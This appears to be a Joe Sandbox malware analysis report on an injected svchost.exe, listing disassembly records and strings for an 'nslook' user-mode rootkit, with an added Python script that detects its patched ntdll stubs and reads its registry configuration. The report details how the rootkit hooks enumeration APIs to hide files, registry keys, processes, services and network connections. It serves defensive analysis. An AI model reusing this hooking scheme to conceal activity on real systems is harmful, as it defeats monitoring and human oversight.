                            • Instruction ID: 427cc18b25853ee7a199cf75ee2ba1cf8abdff37ec19450f3a5dd67acf58f9c1
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 13113B3A648B8486E761DB15B48069EB7A4FBC8FC4F94412AEF8D83B19CF38C450CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: a00d94acbf7ebcbcfd849c3615465f6c0cb00e36825a4583f04f19683b946d1f
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: 90112876245B8882EB228B15F44079DB7A5FB88F98F984624EF9907B68DF38C551CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: a3528309b1b56a0f4acd01bd21fc3cbe3ffbd88dc1459a03dea56e18f42981c8
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: D8F0B47D24179882F706AB52B440ADD3260AF88FC8FC84829AE0907B19CF38C485C361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 99ed183c038f07a0e78c13ce4852a175a5f65e52f6d0a68cb59207a5de2aea1a
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: 3BE065BD28264896FB1B6B51F440ADD3232AF88FC8FC848299A060B255CE38C584C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 7aa8b90339ad11b9a3d11ace94312d56e96ba4ecdfe9c8b7944ca494a80b14b6
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 47C15632610B118AE710EF71E9913DE7BB8F788F88F018016DA8967B69DF7AD455C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: cfcfdb69c580174a336b7621ea8a573ae88536a7c2ad23099a056eb73ab51e3e
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: FA415931A04B8282FB64AB35F6657DA33A9FB44F84F040029DD4A66B95EF3FC018C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: c57af3be4dbddc60cac9372473c9671a23a205f75f5a56761055a69f52157214
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: C7E0EC3060170290FA927BBAAF87BD9379D6B49FC8F241024994D973E3EF6A8459D305
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; the extracted edge list is not reproduced)
                            • Function 1b8bff135d0, basic blocks 1b8bff135d0-1b8bff138e6; block 1b8bff13740 calls LoadLibraryA and is re-entered from 1b8bff137af, i.e. the library load sits in a loop
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: ab77a3e53c36e480a52c6020d070c619eab97f15d0c7f7e71008ffb406637f0e
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: F381467370169087EB559F21D650BEB77A9FB44FA0F058124EE0947388EF3ADA25C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: ae7d0747505b0c317d4bbc2cbab73e77f5ff364b546457f2210d1e22a6337268
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 46317C36214F8186EB60EF35E9903DE73A8F788B94F540126EA9D53B99EF39C155CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: 549c974a4702cac34c8ca3658ecf33f9df967db3ec95e7d542efce5b3d575890
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: E3D1EF72704B809AE710EB78D6A02DD7BB9F745B88F144216CE8E57B99DF39E01AC740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; the extracted edge list is not reproduced)
                            • Function 1b8bff41f20, basic blocks 1b8bff41f20-1b8bff42259; GetCurrentThread at entry, then a straight chain of GetModuleHandleA/GetProcAddress pairs, each with one branch that calls 1b8bff45fa0 before the next pair
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 6d3ca59ef6d23025bc66e82b69caf1ecafca9b061aa98823ff22e798ea37ebef
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 5491C374602B06A1FE55FB38FAA53E433ACBF44F80FA45426850E623A4EF7AD559C311
                            Uniqueness

                            Uniqueness Score: -1.00%
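Two records in this section describe the hiding mechanism behind the "Hooks ... query functions" and "Modifies the prolog of user mode functions" signatures: the function above resolves NtDeviceIoControlFile, NtEnumerateKey, NtEnumerateValueKey, NtQueryDirectoryFile, NtQueryDirectoryFileEx, NtQuerySystemInformation, NtResumeThread, EnumServicesStatusExW and EnumServiceGroupW from ntdll.dll, advapi32.dll and sechost.dll, and the earlier record for 1b8bff40000 reads SOFTWARE\nslookconfig with the values paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp. Taken together this is a user-mode rootkit in the injected svchost.exe: the prologs of the enumeration APIs are overwritten so that configured entries drop out of file, registry, process and service listings (and, given the tcp_local/tcp_remote/udp values next to the NtDeviceIoControlFile hook, presumably network endpoints). The script below is an added triage example; it is not part of the Joe Sandbox report and not code from the sample. It checks, inside the process it runs in, whether the listed ntdll.dll stubs still begin with the unmodified x64 syscall prolog (mov r10, rcx; mov eax, ssn) and whether the configuration key can be opened by exact path. Assumptions: 64-bit Python on x64 Windows (the stub layout is the x64 one), and that the key lives under HKLM or HKCU, since the report shows only the subkey path; the meaning of the value names is not known from the report and is not interpreted.

```python
"""Triage helper for the user-mode hook set listed in this report.

Added example: not part of the Joe Sandbox report and not the sample's code.
Assumptions: 64-bit Python on x64 Windows (the stub layout below is the x64
one), and that SOFTWARE\\nslookconfig lives under HKLM or HKCU; the report
shows only the subkey path and the value names, not their meaning.
"""
import struct
import sys
from typing import Optional, Tuple

# Exports the injected svchost.exe resolves by name (from the report's string list).
NTDLL_TARGETS = [
    "NtDeviceIoControlFile", "NtEnumerateKey", "NtEnumerateValueKey",
    "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
    "NtQuerySystemInformation", "NtResumeThread",
]
OTHER_TARGETS = {"advapi32.dll": ["EnumServicesStatusExW"],
                 "sechost.dll": ["EnumServiceGroupW"]}
CONFIG_SUBKEY = r"SOFTWARE\nslookconfig"
CONFIG_VALUES = ["paths", "pid", "process_names", "service_names",
                 "startup", "tcp_local", "tcp_remote", "udp"]


def classify_stub(prolog: bytes) -> str:
    """Classify the leading bytes of an x64 ntdll Nt* export.

    Unmodified: 4C 8B D1 B8 <ssn>   (mov r10, rcx ; mov eax, imm32)
    Hooked:     E9 <rel32>          (jmp rel32)
                FF 25 <disp32>      (jmp [rip+disp32])
                48 B8 <imm64> FF E0 (mov rax, imm64 ; jmp rax)
    """
    if len(prolog) < 8:
        return "short"
    if prolog[:4] == b"\x4c\x8b\xd1\xb8":
        return "clean"
    if prolog[0] == 0xE9 or prolog[:2] == b"\xff\x25":
        return "hooked"
    if prolog[:2] == b"\x48\xb8" and prolog[10:12] == b"\xff\xe0":
        return "hooked"
    return "unknown"


def syscall_number(prolog: bytes) -> Optional[int]:
    """Syscall number encoded in a clean stub, None otherwise."""
    if classify_stub(prolog) != "clean":
        return None
    return struct.unpack_from("<I", prolog, 4)[0]


def hook_target(prolog: bytes, base: int) -> Optional[int]:
    """Destination of a 'jmp rel32' placed at `base`, None otherwise."""
    if classify_stub(prolog) != "hooked" or prolog[0] != 0xE9:
        return None
    rel = struct.unpack_from("<i", prolog, 1)[0]
    return (base + 5 + rel) & 0xFFFFFFFFFFFFFFFF


def read_prolog(module: str, name: str, n: int = 16) -> Tuple[Optional[int], Optional[bytes]]:
    """Windows only: address and first n bytes of an export in this process."""
    import ctypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    handle = ctypes.WinDLL(module)._handle  # LoadLibrary; same handle if already loaded
    addr = k32.GetProcAddress(handle, name.encode("ascii"))
    if not addr:
        return None, None
    return addr, ctypes.string_at(addr, n)


def config_values() -> dict:
    """Windows only: read the config values by exact name from HKLM/HKCU (hive assumed).

    The hooked set covers NtEnumerateKey/NtEnumerateValueKey (listing), not
    NtOpenKey/NtQueryValueKey, so direct opens by full path are expected to
    work even from a process that carries the hooks.
    """
    import winreg
    found = {}
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE),
                            ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, CONFIG_SUBKEY) as key:
                vals = {}
                for value in CONFIG_VALUES:
                    try:
                        vals[value] = winreg.QueryValueEx(key, value)[0]
                    except FileNotFoundError:
                        pass
                found[hive_name] = vals
        except OSError:
            pass
    return found


def main() -> None:
    if sys.platform != "win32":
        print("live checks need Windows; only the stub classifier is usable here")
        return
    for name in NTDLL_TARGETS:
        addr, prolog = read_prolog("ntdll.dll", name)
        state = classify_stub(prolog) if prolog else "missing"  # NtQueryDirectoryFileEx is absent on old builds
        detail = ""
        if state == "clean":
            detail = f" ssn={syscall_number(prolog):#x}"
        elif state == "hooked" and hook_target(prolog, addr) is not None:
            detail = f" -> {hook_target(prolog, addr):#x}"
        print(f"ntdll!{name:<26} {state}{detail}")
    for module, names in OTHER_TARGETS.items():
        for name in names:
            _, prolog = read_prolog(module, name)
            # No fixed prolog for these exports: a leading jmp is the only cheap signal.
            state = "jmp-at-entry" if prolog and prolog[0] == 0xE9 else "no leading jmp"
            print(f"{module}!{name:<22} {state}")
    print("nslookconfig:", config_values() or "not found")


if __name__ == "__main__":
    main()
```

Run it as 64-bit Python from a freshly started process: a "hooked" result there means the implant also patches newly created processes, not only the svchost.exe instances it injects into; a "clean" result says nothing about those instances, whose ntdll bytes have to be inspected with a debugger or a memory dump using the same byte patterns. The advapi32.dll and sechost.dll exports have no fixed prolog, so the script only flags a leading jmp for them; a byte-for-byte comparison with the on-disk image is needed for a definitive answer. A "clean" stub on a WoW64 (32-bit) process is a false negative, because the 32-bit stub layout differs from the one checked here.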

                            Control-flow Graph (rendered graph omitted; the extracted edge list is not reproduced)
                            • Function 1b8bff429e0, basic blocks 1b8bff429e0-1b8bff42fca; GetFileType and GetFinalPathNameByHandleW at entry, then lstrlenW/lstrcpyW/lstrcatW/PathCombineW string building and three loops of lstrcmpiW or lstrcmpW comparisons
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: cb3dc28ea3c4a4d2d026e485507e44396be361c5efe6bcf43255f04362c8f0a1
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 36F1AD32700B828AEB24AF35EA903D977A8F788F94F544025DA4967F98DF3AD549C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 5aa5af5c47ef2683f1c9420351592a518d8a25bc05bfc994c458915122eefd5f
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 51F1ED3670579282EB64AF26E6407EDB3A9F788F80F544026CE49A7784DF3AC854D744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 052a65238b3bbb239cc4e42bacc6ee20b74eebe6b3f8e3e1b78403131301fba7
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 3E9181362046C181FB60AF35EA503EE77A8F785F84F444026CA8A63B99DF3AD549CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 5a1eedef5d2f6dd78e6fd221f0fbcfa1c0c656bea85fb7cae13ccf6284997451
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 29316F36604B4086EB20AF35F66479AB3A8F789FA4F550125DE5D03BA8DF3ED549CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: c8ae5aca2a4f612d89ec8aedd07320126b2046e0d1eefa54b9200476324fcd40
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: D381D07271468986FF64BB79AB813EB7399A785F80F044115BB0843396EF7BCA42C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 3a88d0bc714e7cab74a086d236e4b3afd088008c47020c10570fca8e2b8efe5c
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: E581CF31A04A4386FB64BB7A97913D973ACBB85F80F1441259E48A3796EF3BC845D704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: a53f7fdc902fb4f2fa91fe0d52c19dc9f861a05065ccde734e9bc8b6e64c733f
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 3F81CE76302A5696FB54BF76E7943A973A9F740FC0F054029CA0667B90EF36E468E300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: f8c7c4772f58d7f68e4874eb2b5f470208e57190687a01bab14a1584c3334f0d
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: C8516B72604B8187EB65EB21FA9139EB3A8F389F80F004529DB9957B59DF39D065CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: b937edd41fe89e6200a7b9c78e6be1627db444eb7e017a4b0a9525fb1e2eb3b1
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 3361F531625B4291EF91FB28F6A17DA73A8FB44F44F542025A98E277A5EF3EC108C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 6f73d6dcfb3615375baa24daab3803a4a75f3bc2b7400d15212ba5295ccf1c98
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 9631E132316B4281EE12BF27AA007D9B39CF758FA4F194125DD291B795EF7AC144D300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: f5005cc2ea65ae7c61931ab92c97414a19f8c3f93b082654ee1533911d63e787
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 14319F727006429AEB14AF36D6903E8B77ABB48F84F944025CE0A67F94DF7AD955C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 1a69fd29da5c4f9a2ec6f1110c81e3249ffd3cd67aab0f28cecd040108f68699
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 6E31BF3660468682FB64BF35EA943ED7368FB40F84F544026CE0A63BA4DF3AD509D708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 3a72b7ed54437a720ec44cb2ea935fa2f4f4e461725da61f96e90663b19d8ddc
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 6A11BF32710B4086E750AB62F954399B7A8F788FE4F104325EE1D87BA8CF39D818C744
                            Uniqueness

